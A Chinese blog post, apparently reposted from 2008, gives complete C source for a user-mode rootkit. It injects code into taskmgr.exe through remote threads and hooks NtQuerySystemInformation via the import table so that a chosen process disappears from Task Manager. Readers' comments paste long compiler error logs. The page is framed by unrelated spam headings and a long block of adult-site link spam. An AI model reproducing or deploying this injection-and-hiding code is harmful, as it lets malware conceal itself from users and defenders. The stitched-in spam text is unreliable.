青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

隨筆-16  評論-116  文章-0  trackbacks-0
原文:http://blog.csdn.net/dalixux/archive/2008/10/14/3072436.aspx

使用代碼注入來實現進程隱藏  而不是使用DLL注入來實現進程隱藏 
沒有什么高級技術  純體力活  原理就不說了  只是沒有通過DLL注入  來實現HOOK API
從核心編程 以來  似乎 一提到C注入 就是DLL注入 很奇怪 為什么沒人寫個完整的代碼注入
所以 自己動手寫了下
純粹注入代碼   邪惡二進制上 也有個代碼注入的 只是用了一個未公開的函數,我還看不懂
= =本來想用匯編寫的  發現匯編注入代碼遠比C注入代碼來的繁  所以用C實現了
主要功能就是 隱藏進程   不過RING3的似乎沒多大用  練習而已
代碼如下:

//需要編譯成release版本  DEBUG版本 對函數生成的跳轉地址表
//jmp xxxxx  寫入遠程進程的時候xxxxx等于寫入了一個全局變量
// 程序必然崩潰
#include "Iat_Hook.h"


char cPath[] = "taskmgr.exe";

void main(void)
{
  
//定義變量
  DWORD dwPid;
  HANDLE hProcess;
  DWORD dwSize 
= 2048;
  PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
  REMOTESTRUCT stRemoteStruct;

  
//遍歷進程 尋找taskmgr.exe進程ID
    dwPid = GetProcessPid(cPath);

  
// open process 得到進程句柄
  hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
  
if(hProcess == NULL)
  
{
    printf(
"open error code %d\n",GetLastError());
    
return;
  }

  
  
//寫入 替代函數
  MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);

  
//初始化結構
  InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);

  
//寫入結構
  pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteStructAddress, 
&stRemoteStruct, sizeof(REMOTESTRUCT), NULL);

  
//寫入遠程線程函數
  pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

  
//創建遠程線程
  CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 00);
  CloseHandle(hProcess);
}


DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
{
  FARPROC fpVirtualQuery;
  FARPROC fpVirtualProtect;
  FARPROC fpOpenProcess;
  FARPROC fpEnum;
  FARPROC fpGetProcAddress;
  FARPROC fpLoadLibrary;
  FARPROC fpFreeLibrary;
  FARPROC fpWriteMemory;
  FARPROC fplstrcmp;

  HANDLE hProcess 
= NULL;
  HMODULE hMods[
256];
  DWORD dwNeed;
  HANDLE hPsapi;
  MEMORY_BASIC_INFORMATION stMem;
  HMODULE hKernel, hModule;
  PIMAGE_NT_HEADERS pImageNtHeaders;
  PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
  IMAGE_DATA_DIRECTORY ImageImport;
  PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
  PIMAGE_THUNK_DATA pImageThunkData;
  DWORD oldProtect;
  wchar_t 
*= pRemoteStruct->cProcessName;

  
//初始化函數指針
  fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
  fpVirtualProtect 
= (FARPROC)pRemoteStruct->dwVirtualProtect;
  fpOpenProcess 
= (FARPROC)pRemoteStruct->dwOpenProcess;
  fpLoadLibrary 
= (FARPROC)pRemoteStruct->dwLoadLibrary;
  fpFreeLibrary 
= (FARPROC)pRemoteStruct->dwFreeLibrary;
  fpGetProcAddress 
= (FARPROC)pRemoteStruct->dwGetProcAddress;
  fpWriteMemory 
= (FARPROC)pRemoteStruct->dwWriteProcessMemory;
  fplstrcmp 
= (FARPROC)pRemoteStruct->dwlstrcmp;

  
//得到進程句柄
  hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
  
if(!hProcess)
    
return 0;

  
//得到模塊基址 模塊基址存放于hMods[0]
  hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
  fpEnum 
= (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
  fpEnum(hProcess, hMods, 
sizeof(hMods), &dwNeed);
  fpFreeLibrary(hPsapi);
  hModule 
= hMods[0];

  
//改變內存屬性  因為采用的不是DLL插入 NtQuerySystemInformation的原始地址無法通過
  
//全局變量傳遞給 替代函數 這里通過把函數地址寫入kernel的PE頭 來實現 這樣只需要在替代函數中讀出地址就可以了
  hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
  fpVirtualQuery(hKernel,
&stMem, sizeof (MEMORY_BASIC_INFORMATION));
  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, 
&stMem.Protect);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)
+4&pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)
+8&pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)
+0x14&p, sizeof(DWORD), NULL);
  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, 
&oldProtect);

  
//查找導入表 找到存放NtQuerySystemInformation
  pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c+ (DWORD)hModule);
  pImageOptionalHeader 
= &pImageNtHeaders->OptionalHeader;
    ImageImport 
= pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
  pImageImportDescriptor 
= (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);

  
while(pImageImportDescriptor->Name)
  
{
    
if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))
    
{      
      
break;
    }

    pImageImportDescriptor
++;
  }

  
//替換 NtQuerySystemInformation的地址
  pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);
  
while(pImageThunkData->u1.Function)
  
{
    
if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)
    
{
      fpVirtualQuery(
&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));
      fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, 
&stMem.Protect);
      pImageThunkData
->u1.Function =  pRemoteStruct->dwMyAddress;
      
break;
    }

    pImageThunkData
++;
  }

  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, 
&oldProtect);
  
return 0;
}


NTSTATUS WINAPI myNtQuerySystemInformation  (
              SYSTEM_INFORMATION_CLASS SystemInformationClass,
        PVOID SystemInformation,
          ULONG SystemInformationLength,
                PULONG ReturnLength)
{
  HANDLE hKernel;
  NTSTATUS ntStatus;
  wchar_t 
*pName;
  PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;

  FARPROC fpNtQuerySystem;
  FARPROC fplstrcmpW;

  
//尋找kernel32的基址  準備讀取需要用到的函數地址
  _asm 
  
{
    mov eax,fs:[
0x30]
    mov eax,[eax
+0xc]
    mov ecx,[eax
+0x1c]
    mov ecx, [ecx]
    mov eax, [ecx
+8]
    mov hKernel,eax
  }

  
//取得函數地址
  fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
  fplstrcmpW 
= *(FARPROC *)((DWORD)hKernel + 8);
  
//取得 需隱藏的進程名
  pName = *(wchar_t **)((DWORD)hKernel + 0x14);

  ntStatus 
= (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
  
if (SystemProcessesAndThreadsInformation == SystemInformationClass)
  
{
    pForward 
= NULL;
    pCurrent 
= (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
    
while(pCurrent->NextEntryDelta)//檢驗是否到 最后一個進程結構
    {
      
if(pCurrent->ProcessName.Buffer)
      
{
        
//_asm int 3
        if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
        
{
          
if(pForward)
          
{
            
if(pCurrent->NextEntryDelta)//隱藏的進程在鏈表中間              
            {
              pForward
->NextEntryDelta += pCurrent->NextEntryDelta;
            }

            
else//隱藏的進程在鏈表末端
              pForward->NextEntryDelta = 0;
          }

          
else //要隱藏的進程在鏈表頭時
          {
            
if(pCurrent->NextEntryDelta)
            
{
              SystemInformation 
= (PBYTE)pCurrent + pCurrent->NextEntryDelta;
            }

            
else
              SystemInformation 
= NULL;
          }

        }

      }

        pForward 
= pCurrent;
        pCurrent 
= (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);
    }

    
//_asm int 3
  }

  
return ntStatus;
}



//得到進程PID
DWORD GetProcessPid(char *cPath)
{
  PROCESSENTRY32 stProcess;
  HANDLE hSnap;
  BOOL bRet;
  hSnap 
= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  
if(hSnap == INVALID_HANDLE_VALUE)
  
{
    printf(
"error\n");
    
return 0;
  }

  stProcess.dwSize 
= sizeof (PROCESSENTRY32);
  bRet 
= Process32First(hSnap, &stProcess);
  
if(!bRet)
  
{
    printf(
"first error\n");
    
return 0;
  }

  
do
  
{
    
if(0 == strcmp(stProcess.szExeFile, cPath)) //find  process of target
    {
      
break;
    }

  }
while(Process32Next(hSnap, &stProcess));

  
//確認 是否找到 目標進程
  if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))
  
{
    printf(
"can not find process\n");
    
return 0;
  }

  CloseHandle(hSnap);
  
return stProcess.th32ProcessID;
}


VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
{
  HANDLE hNtdll;
  HANDLE hKernel;

  hNtdll 
= LoadLibrary("ntdll.dll");
  pRemoteStruct
->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
  FreeLibrary(hNtdll);

  hKernel 
= LoadLibrary("kernel32.dll");
  pRemoteStruct
->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
  pRemoteStruct
->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
  pRemoteStruct
->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");
  pRemoteStruct
->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
  pRemoteStruct
->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
  pRemoteStruct
->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
  pRemoteStruct
->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
  pRemoteStruct
->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");
  pRemoteStruct
->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");
  FreeLibrary(hKernel);
  
  pRemoteStruct
->dwMyAddress = MyAddress;
  pRemoteStruct
->dwPid = dwPid;
  strcpy(pRemoteStruct
->cDllName, "Psapi.dll");
  strcpy(pRemoteStruct
->cFunName, "EnumProcessModules");
  strcpy(pRemoteStruct
->cKernel,"Kernel32.dll");
  strcpy(pRemoteStruct
->cNtdll, "ntdll.dll");
        
//要隱藏的進程名
  wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
}


Iat_Hook.h

//頭文件
#include <windows.h>
#include 
<stdio.h>
#include 
<stdlib.h>
#include 
<string.h>
#include 
<tlhelp32.h>
#include 
<imagehlp.h>
#include 
"Winternl.h"

#pragma comment(lib, 
"imagehlp")
//類型聲明

typedef 
int NTSTATUS;
typedef BOOL (__stdcall 
*ENUMPROCESSMODULES)(
            HANDLE hProcess,
            HMODULE
* lphModule,
            DWORD cb,
            LPDWORD lpcbNeeded
);

typedef NTSTATUS (WINAPI 
*NTQUERYSYSTEMINFORMATION)(
            SYSTEM_INFORMATION_CLASS SystemInformationClass,
            PVOID SystemInformation,
            ULONG SystemInformationLength,
            PULONG ReturnLength
);

typedef 
struct _REMOTE_STRUCT
{
  DWORD dwNtQuerySystem;
  DWORD dwVirtualQuery;
  DWORD dwVirtualProtect;
  DWORD dwOpenProcess;
  DWORD dwMessageBox;
  DWORD dwLoadLibrary;
  DWORD dwGetProcAddress;
  DWORD dwFreeLibrary;
  DWORD dwWriteProcessMemory;
  DWORD dwlstrcmp;
  DWORD dwlstrcmpW;
  DWORD dwEnum;
  DWORD dwMyAddress;
  DWORD dwPid;
  
char cDllName[50];
  
char cFunName[50];
  
char cKernel[50];
  
char cNtdll[50];
  wchar_t cProcessName[
50];//要隱藏的進程名
}
REMOTESTRUCT, *PREMOTESTRUCT;

//函數聲明
DWORD GetProcessPid(char *cPath);
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
NTSTATUS WINAPI myNtQuerySystemInformation  (
              SYSTEM_INFORMATION_CLASS SystemInformationClass,
        PVOID SystemInformation,
          ULONG SystemInformationLength,
                PULONG ReturnLength);

Winternl.h

typedef 
struct _UNICODE_STRING 
  USHORT Length; 
  USHORT MaximumLength; 
  PWSTR  Buffer;                 
//注意,這里為Unicode類型
}
 UNICODE_STRING, *PUNICODE_STRING;

typedef 
enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
}
 SYSTEM_INFORMATION_CLASS;

typedef 
struct _SYSTEM_PROCESS_INFORMATION  
{  
    DWORD NextEntryDelta;  
    DWORD dThreadCount;  
    DWORD dReserved01;  
    DWORD dReserved02;  
    DWORD dReserved03;  
    DWORD dReserved04;  
    DWORD dReserved05;  
    DWORD dReserved06;  
    FILETIME ftCreateTime; 
/* relative to 01-01-1601 */  
    FILETIME ftUserTime; 
/* 100 nsec units */  
    FILETIME ftKernelTime; 
/* 100 nsec units */  
    UNICODE_STRING ProcessName;      
//這就是進程名
    DWORD BasePriority;  
    DWORD dUniqueProcessId;            
//進程ID
    DWORD dParentProcessID;  
    DWORD dHandleCount;  
    DWORD dReserved07;  
    DWORD dReserved08;  
    DWORD VmCounters;  
    DWORD dCommitCharge;  
    PVOID ThreadInfos[
1]; 
}
 SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;


后記:第一次沒有照著書 打代碼 也找不到C 注入代碼的例子 能找到的都是DLL注入原理早就知道了 真的寫一遍 不容易 整個編寫的過程 碰到了很多問題 最終都解決了 輕松了


 

posted on 2008-10-14 13:36 greatws 閱讀(3554) 評論(2)  編輯 收藏 引用

評論:
# re: 代碼注入 API HOOK(非DLL)[轉] 2009-10-31 08:17 | hurong09@163.com
--------------------Configuration: CodeInject - Win32 Debug--------------------
Compiling...
Main.cpp
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(45) : error C2664: 'CreateRemoteThread' : cannot convert parameter 4 from 'void *' to 'unsigned long (__stdcall *)(void *)'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(86) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(91) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(92) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(93) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(94) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(99) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(100) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(101) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(102) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(103) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(104) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(105) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(115) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(125) : error C2446: '==' : no conversion from 'unsigned long' to 'unsigned long *'
Conversion from integral type to pointer type requires reinterpret_cast, C-style cast or function-style cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(125) : error C2040: '==' : 'unsigned long *' differs in levels of indirection from 'unsigned long'
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(127) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(128) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(129) : error C2440: '=' : cannot convert from 'unsigned long' to 'unsigned long *'
Conversion from integral type to pointer type requires reinterpret_cast, C-style cast or function-style cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp  回復  更多評論
  
# re: 代碼注入 API HOOK(非DLL)[轉] 2009-10-31 08:18 | hurong09@163.com
(134) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(168) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(178) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(252) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(253) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(256) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(257) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(258) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(259) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(260) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(261) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(262) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(263) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(264) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\Documents and Settings\Xie YongQuan\Desktop\Main.cpp(265) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
Conversion from 'void*' to pointer to non-'void' requires an explicit cast
Ö´ÐÐ cl.exe ʱ³ö´í.

CodeInject.exe - 1 error(s), 0 warning(s)  回復  更多評論
  

只有注冊用戶登錄后才能發表評論。
網站導航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            国产午夜一区二区三区| 欧美成人dvd在线视频| 91久久久久久久久| 欧美在线国产| 亚洲一区二区精品在线| 亚洲精品国产欧美| 伊人春色精品| 国产日韩精品在线播放| 国产精品高潮呻吟久久av无限| 久久阴道视频| 久久精品国产一区二区三区免费看| 亚洲视频二区| 99re国产精品| 亚洲精品美女免费| 亚洲成在线观看| 欧美成人资源网| 久久亚洲精选| 久久精品一二三区| 欧美一区二区女人| 亚洲性av在线| 亚洲国语精品自产拍在线观看| 狠狠久久婷婷| 韩国美女久久| 黄色成人免费网站| 国内精品久久久久久久影视麻豆 | 在线成人av网站| 国产一区二区三区成人欧美日韩在线观看| 国产精品白丝黑袜喷水久久久| 国外精品视频| 国产精品日韩精品| 国产精品白丝av嫩草影院| 欧美视频中文一区二区三区在线观看 | 在线观看中文字幕不卡| 国产一区在线播放| 狠狠色狠狠色综合日日小说| 国内精品国语自产拍在线观看| 国产亚洲精品福利| 国内精品久久久久国产盗摄免费观看完整版| 国产精品五月天| 国产日韩欧美另类| 激情欧美一区| 91久久精品一区二区别| 亚洲麻豆一区| 亚洲愉拍自拍另类高清精品| 欧美亚洲在线播放| 久久亚洲一区二区| 欧美成人一区二区三区片免费| 欧美激情五月| 亚洲精品影院在线观看| 一区二区三区福利| 欧美一级片一区| 久久久久成人精品| 欧美www在线| 欧美丝袜一区二区三区| 国产欧美精品日韩精品| 国语自产精品视频在线看8查询8 | 欧美日韩国产不卡| 国产精品久久9| 国产亚洲一区二区在线观看 | 欧美一区二区三区免费视频| 久久久久久有精品国产| 欧美电影电视剧在线观看| 欧美日韩午夜精品| 国产嫩草影院久久久久| 在线看片成人| 亚洲香蕉网站| 久久一区二区精品| 亚洲美女一区| 久久高清国产| 欧美日韩一视频区二区| 国产日韩欧美一区二区三区在线观看| 激情综合亚洲| 亚洲午夜久久久| 久久综合激情| 一区二区三区免费网站| 久久精品导航| 欧美午夜不卡| 亚洲福利在线视频| 亚洲女女女同性video| 欧美77777| 亚洲一区视频在线| 免费在线欧美黄色| 国产欧美日韩免费看aⅴ视频| 久久国产黑丝| 欧美日韩免费网站| 激情综合五月天| 亚洲资源av| 欧美激情一区二区三区蜜桃视频 | 国内精品久久久久影院优| 亚洲免费观看在线观看| 久久久久国产精品人| 91久久午夜| 久久久福利视频| 国产精品入口福利| 99re在线精品| 欧美插天视频在线播放| 先锋影院在线亚洲| 欧美日韩不卡视频| 亚洲第一级黄色片| 久久精品欧洲| 亚洲一区国产视频| 欧美日韩少妇| 亚洲精品免费在线| 欧美不卡视频一区发布| 欧美在线视频a| 国产精品男女猛烈高潮激情| 一区二区三区日韩精品视频| 欧美大片国产精品| 久久久久成人精品| 国产亚洲一区在线| 香蕉成人久久| 亚洲无吗在线| 欧美性猛片xxxx免费看久爱| 日韩一级在线观看| 亚洲国产精品日韩| 美女免费视频一区| 亚洲激情国产| 欧美国产成人精品| 麻豆精品一区二区av白丝在线| 激情久久久久久| 老妇喷水一区二区三区| 久久精品中文字幕免费mv| 国产视频精品va久久久久久| 欧美一区二视频| 亚洲欧美自拍偷拍| 国产日韩欧美不卡在线| 欧美资源在线观看| 欧美一区二区三区在线视频 | 亚洲黄色视屏| 免费观看久久久4p| 久久综合久久88| 亚洲高清视频的网址| 欧美高清一区二区| 欧美激情一区二区三区全黄| 亚洲免费成人av| 日韩视频免费在线观看| 欧美亚洲第一页| 欧美有码视频| 久久精品主播| 亚洲精品国产拍免费91在线| 亚洲激情成人网| 欧美视频免费看| 欧美一乱一性一交一视频| 午夜免费在线观看精品视频| 国产一区视频在线观看免费| 免费人成精品欧美精品| 欧美aa国产视频| 亚洲一品av免费观看| 亚洲欧美久久久| 激情亚洲网站| 亚洲日韩视频| 国产精品欧美精品| 久久人体大胆视频| 欧美黄网免费在线观看| 亚洲综合精品一区二区| 欧美综合77777色婷婷| 91久久久久久久久久久久久| 99riav1国产精品视频| 国产婷婷成人久久av免费高清| 久久婷婷人人澡人人喊人人爽| 欧美 日韩 国产精品免费观看| 一区二区久久| 欧美亚洲日本国产| 亚洲欧洲视频| 亚洲婷婷综合久久一本伊一区| 国产一区二区三区免费观看| 欧美激情欧美狂野欧美精品 | 亚洲国产精品成人综合色在线婷婷| 亚洲黄色在线看| 国产精品一区三区| 亚洲福利视频一区二区| 国产精品毛片| 亚洲高清在线精品| 国产欧美欧美| 亚洲国产天堂久久综合| 国产美女精品视频免费观看| 亚洲国产高清高潮精品美女| 国产精品青草久久| 欧美成人中文字幕| 国产精品亚洲视频| 亚洲国产你懂的| 国产亚洲欧美中文| 日韩亚洲不卡在线| 亚洲第一精品夜夜躁人人躁 | 一区二区亚洲精品国产| 一区二区三区 在线观看视频| 禁久久精品乱码| 亚洲视频一区二区在线观看| 亚洲大胆av| 欧美亚洲三级| 亚洲男人第一网站| 欧美激情第8页| 浪潮色综合久久天堂| 国产精品每日更新| 亚洲日本无吗高清不卡| 1000部精品久久久久久久久| 午夜精品成人在线视频| 亚洲素人在线| 欧美噜噜久久久xxx| 美腿丝袜亚洲色图|